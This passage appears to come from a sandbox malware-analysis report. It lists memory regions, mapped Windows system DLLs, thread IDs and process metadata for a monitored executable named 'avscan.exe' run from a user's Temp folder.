1099 start_va = 0x7fefd6c0000 end_va = 0x7fefd6cefff monitored = 0 entry_point = 0x7fefd6c1010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 1100 start_va = 0x7fefd7b0000 end_va = 0x7fefd7c3fff monitored = 0 entry_point = 0x7fefd7b10e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 1101 start_va = 0x7fefd920000 end_va = 0x7fefd98bfff monitored = 0 entry_point = 0x7fefd922780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1102 start_va = 0x7fefde50000 end_va = 0x7fefdee8fff monitored = 0 entry_point = 0x7fefde51c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1103 start_va = 0x7fefdef0000 end_va = 0x7fefdf0efff monitored = 0 entry_point = 0x7fefdef60e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1104 start_va = 0x7fefdf10000 end_va = 0x7fefe112fff monitored = 0 entry_point = 0x7fefdf33330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1105 start_va = 0x7fefe120000 end_va = 0x7fefe1e8fff monitored = 0 entry_point = 0x7fefe19a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1106 start_va = 0x7fefe1f0000 end_va = 0x7fefef77fff monitored = 0 entry_point = 0x7fefe26cebc region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1107 start_va = 0x7fefef80000 end_va = 0x7fefef8dfff monitored = 0 entry_point = 0x7fefef81080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1108 start_va = 0x7feff3d0000 end_va = 0x7feff4d8fff monitored = 0 entry_point = 0x7feff3d1064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1109 start_va = 0x7feff550000 end_va = 0x7feff626fff monitored = 0 entry_point = 0x7feff553274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1110 start_va = 0x7feff630000 end_va = 0x7feff6a0fff monitored = 0 entry_point = 0x7feff641e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1111 start_va = 0x7feff7d0000 end_va = 0x7feff86efff monitored = 0 entry_point = 0x7feff7d25a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1112 start_va = 0x7feff870000 end_va = 0x7feff94afff monitored = 0 entry_point = 0x7feff890760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1113 start_va = 0x7feff950000 end_va = 0x7feff97dfff monitored = 0 entry_point = 0x7feff951010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1114 start_va = 0x7feff980000 end_va = 0x7feff9e6fff monitored = 0 entry_point = 0x7feff98b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1115 start_va = 0x7feffa60000 end_va = 0x7feffb8cfff monitored = 0 entry_point = 0x7feffaaed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1116 start_va = 0x7feffba0000 end_va = 0x7feffba0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1117 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 1118 start_va = 0x7fffffd3000 end_va = 0x7fffffd4fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 1119 start_va = 0x7fffffd5000 end_va = 0x7fffffd6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd5000" filename = "" Region: id = 1120 start_va = 0x7fffffd7000 end_va = 0x7fffffd8fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd7000" filename = "" Region: id = 1121 start_va = 0x7fffffd9000 end_va = 0x7fffffdafff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd9000" filename = "" Region: id = 1122 start_va = 0x7fffffdb000 end_va = 0x7fffffdcfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdb000" filename = "" Region: id = 1123 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 1124 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 1132 start_va = 0x7fef7650000 end_va = 0x7fef773dfff monitored = 0 entry_point = 0x7fef76512a0 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1133 start_va = 0x1b10000 end_va = 0x1b10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b10000" filename = "" Region: id = 1134 start_va = 0x1b20000 end_va = 0x1b21fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b20000" filename = "" Region: id = 1135 start_va = 0x7fefc300000 end_va = 0x7fefc4f3fff monitored = 0 entry_point = 0x7fefc48c924 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll") Region: id = 1136 start_va = 0x1b30000 end_va = 0x1b30fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 1137 start_va = 0x1b40000 end_va = 0x1b41fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001b40000" filename = "" Region: id = 1138 start_va = 0x7fefa140000 end_va = 0x7fefa196fff monitored = 0 entry_point = 0x7fefa141118 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 1139 start_va = 0x7fef4220000 end_va = 0x7fef4610fff monitored = 0 entry_point = 0x7fef43ad21c region_type = mapped_file name = "mf.dll" filename = "\\Windows\\System32\\mf.dll" (normalized: "c:\\windows\\system32\\mf.dll") Region: id = 1140 start_va = 0x7fefb3a0000 end_va = 0x7fefb3b8fff monitored = 0 entry_point = 0x7fefb3a11a8 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 1141 start_va = 0x7fef20e0000 end_va = 0x7fef214cfff monitored = 0 entry_point = 0x7fef20e131c region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 1142 start_va = 0x7feffa10000 end_va = 0x7feffa5cfff monitored = 0 entry_point = 0x7feffa11070 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1143 start_va = 0x7feff540000 end_va = 0x7feff547fff monitored = 0 entry_point = 0x7feff541504 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 1144 start_va = 0x7fefb760000 end_va = 0x7fefb768fff monitored = 0 entry_point = 0x7fefb761010 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll") Region: id = 1145 start_va = 0x7fefc990000 end_va = 0x7fefc99bfff monitored = 0 entry_point = 0x7fefc991064 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 1146 start_va = 0x74220000 end_va = 0x74225fff monitored = 0 entry_point = 0x74221010 region_type = mapped_file name = "ksuser.dll" filename = "\\Windows\\System32\\ksuser.dll" (normalized: "c:\\windows\\system32\\ksuser.dll") Region: id = 1147 start_va = 0x7fef3e90000 end_va = 0x7fef3efafff monitored = 0 entry_point = 0x7fef3e9101c region_type = mapped_file name = "photometadatahandler.dll" filename = "\\Windows\\System32\\PhotoMetadataHandler.dll" (normalized: "c:\\windows\\system32\\photometadatahandler.dll") Region: id = 1148 start_va = 0x7fefbb80000 end_va = 0x7fefbca9fff monitored = 0 entry_point = 0x7fefbb83810 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 1149 start_va = 0x1b30000 end_va = 0x1b30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b30000" filename = "" Region: id = 1150 start_va = 0x1b50000 end_va = 0x1b50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001b50000" filename = "" Thread: id = 48 os_tid = 0xfc8 Thread: id = 49 os_tid = 0xfbc Thread: id = 50 os_tid = 0xfb8 Thread: id = 51 os_tid = 0xfb4 Thread: id = 52 os_tid = 0xfac Thread: id = 53 os_tid = 0xfa4 Thread: id = 54 os_tid = 0xfa0 Process: id = "5" image_name = "avscan.exe" filename = "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe" page_root = "0x360d1000" os_pid = "0xfd4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xf34" cmd_line = "C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0ba" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1154 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1155 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1156 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1157 start_va = 0x50000 end_va = 0x8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1158 start_va = 0x90000 end_va = 0x28ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 1159 start_va = 0x290000 end_va = 0x293fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 1160 start_va = 0x400000 end_va = 0xde0fff monitored = 1 entry_point = 0xdded44 region_type = mapped_file name = "avscan.exe" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe") Region: id = 1161 start_va = 0x77880000 end_va = 0x77a28fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1162 start_va = 0x77a60000 end_va = 0x77bdffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1163 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 1164 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 1165 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 1166 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 1167 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 1168 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1169 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1170 start_va = 0xdf0000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1171 start_va = 0x75350000 end_va = 0x7538efff monitored = 0 entry_point = 0x7537e088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1172 start_va = 0x752f0000 end_va = 0x7534bfff monitored = 0 entry_point = 0x7532f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1173 start_va = 0x752e0000 end_va = 0x752e7fff monitored = 0 entry_point = 0x752e20f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1174 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1175 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1176 start_va = 0x77660000 end_va = 0x7777efff monitored = 0 entry_point = 0x77675340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1177 start_va = 0x77660000 end_va = 0x7777efff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077660000" filename = "" Region: id = 1178 start_va = 0x77780000 end_va = 0x77879fff monitored = 0 entry_point = 0x7779a2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1179 start_va = 0x77780000 end_va = 0x77879fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000077780000" filename = "" Region: id = 1180 start_va = 0xfd0000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1181 start_va = 0x75a80000 end_va = 0x75b8ffff monitored = 0 entry_point = 0x75a93283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1182 start_va = 0x77240000 end_va = 0x77286fff monitored = 0 entry_point = 0x772474c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1183 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1184 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 1185 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 1186 start_va = 0x2a0000 end_va = 0x306fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1187 start_va = 0x75980000 end_va = 0x75a7ffff monitored = 0 entry_point = 0x7599b6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1188 start_va = 0x771b0000 end_va = 0x7723ffff monitored = 0 entry_point = 0x771c6343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1189 start_va = 0x75820000 end_va = 0x75829fff monitored = 0 entry_point = 0x758236a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 1190 start_va = 0x75bc0000 end_va = 0x75c5cfff monitored = 0 entry_point = 0x75bf3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 1191 start_va = 0x76dc0000 end_va = 0x76e6bfff monitored = 0 entry_point = 0x76dca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1192 start_va = 0x76f40000 end_va = 0x76fdffff monitored = 0 entry_point = 0x76f549e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1193 start_va = 0x75960000 end_va = 0x75978fff monitored = 0 entry_point = 0x75964975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1194 start_va = 0x774e0000 end_va = 0x775cffff monitored = 0 entry_point = 0x774f0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1195 start_va = 0x755b0000 end_va = 0x7560ffff monitored = 0 entry_point = 0x755ca3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1196 start_va = 0x755a0000 end_va = 0x755abfff monitored = 0 entry_point = 0x755a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1197 start_va = 0x775d0000 end_va = 0x7765efff monitored = 0 entry_point = 0x775d3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1198 start_va = 0x76c60000 end_va = 0x76dbbfff monitored = 0 entry_point = 0x76caba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1199 start_va = 0x75cc0000 end_va = 0x76909fff monitored = 0 entry_point = 0x75d41601 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1200 start_va = 0x75c60000 end_va = 0x75cb6fff monitored = 0 entry_point = 0x75c79ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1201 start_va = 0x745b0000 end_va = 0x745b8fff monitored = 0 entry_point = 0x745b1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 1202 start_va = 0x72940000 end_va = 0x72a92fff monitored = 1 entry_point = 0x72941af8 region_type = mapped_file name = "msvbvm60.dll" filename = "\\Windows\\SysWOW64\\msvbvm60.dll" (normalized: "c:\\windows\\syswow64\\msvbvm60.dll") Region: id = 1203 start_va = 0xdf0000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1204 start_va = 0xf50000 end_va = 0xfcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f50000" filename = "" Region: id = 1205 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1206 start_va = 0x1330000 end_va = 0x14b7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001330000" filename = "" Region: id = 1207 start_va = 0x20000 end_va = 0x3dfff monitored = 0 entry_point = 0x3158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1208 start_va = 0x76920000 end_va = 0x7697ffff monitored = 0 entry_point = 0x7693158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1209 start_va = 0x76e70000 end_va = 0x76f3bfff monitored = 0 entry_point = 0x76e7168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 1210 start_va = 0x14c0000 end_va = 0x1640fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000014c0000" filename = "" Region: id = 1211 start_va = 0x1650000 end_va = 0x2a4ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001650000" filename = "" Region: id = 1212 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1213 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1214 start_va = 0xdf0000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1215 start_va = 0xf20000 end_va = 0xf2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f20000" filename = "" Region: id = 1216 start_va = 0x2a50000 end_va = 0x2e4ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a50000" filename = "" Region: id = 1217 start_va = 0x2e50000 end_va = 0x311efff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1218 start_va = 0x3120000 end_va = 0x332ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1219 start_va = 0xfd0000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1220 start_va = 0x1130000 end_va = 0x132ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001130000" filename = "" Region: id = 1221 start_va = 0x75410000 end_va = 0x75493fff monitored = 0 entry_point = 0x754119a9 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\\comctl32.dll") Region: id = 1222 start_va = 0x310000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1223 start_va = 0x75400000 end_va = 0x75404fff monitored = 0 entry_point = 0x754011d0 region_type = mapped_file name = "shfolder.dll" filename = "\\Windows\\SysWOW64\\shfolder.dll" (normalized: "c:\\windows\\syswow64\\shfolder.dll") Region: id = 1224 start_va = 0xdf0000 end_va = 0xeeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000df0000" filename = "" Region: id = 1225 start_va = 0xf00000 end_va = 0xf0ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000f00000" filename = "" Region: id = 1226 start_va = 0x3120000 end_va = 0x3297fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1227 start_va = 0x32f0000 end_va = 0x332ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 1228 start_va = 0xfd0000 end_va = 0x10cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000fd0000" filename = "" Region: id = 1229 start_va = 0x10d0000 end_va = 0x110ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000010d0000" filename = "" Region: id = 1230 start_va = 0x7ebd0000 end_va = 0x7efa0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ebd0000" filename = "" Region: id = 1231 start_va = 0x3330000 end_va = 0x342ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 1232 start_va = 0x310000 end_va = 0x310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000310000" filename = "" Region: id = 1233 start_va = 0x3c0000 end_va = 0x3cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000003c0000" filename = "" Region: id = 1234 start_va = 0x320000 end_va = 0x320fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 1235 start_va = 0x744d0000 end_va = 0x7454ffff monitored = 0 entry_point = 0x744e37c9 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1236 start_va = 0x3120000 end_va = 0x31fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003120000" filename = "" Region: id = 1237 start_va = 0x3210000 end_va = 0x3297fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003210000" filename = "" Region: id = 1238 start_va = 0x3430000 end_va = 0x350efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003430000" filename = "" Region: id = 1239 start_va = 0x330000 end_va = 0x330fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 1240 start_va = 0x340000 end_va = 0x340fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 1241 start_va = 0x3510000 end_va = 0x3627fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 1242 start_va = 0x350000 end_va = 0x350fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000350000" filename = "" Region: id = 1243 start_va = 0x74670000 end_va = 0x7467afff monitored = 0 entry_point = 0x74671992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1244 start_va = 0x360000 end_va = 0x360fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "tzres.dll" filename = "\\Windows\\SysWOW64\\tzres.dll" (normalized: "c:\\windows\\syswow64\\tzres.dll") Region: id = 1245 start_va = 0x370000 end_va = 0x376fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = 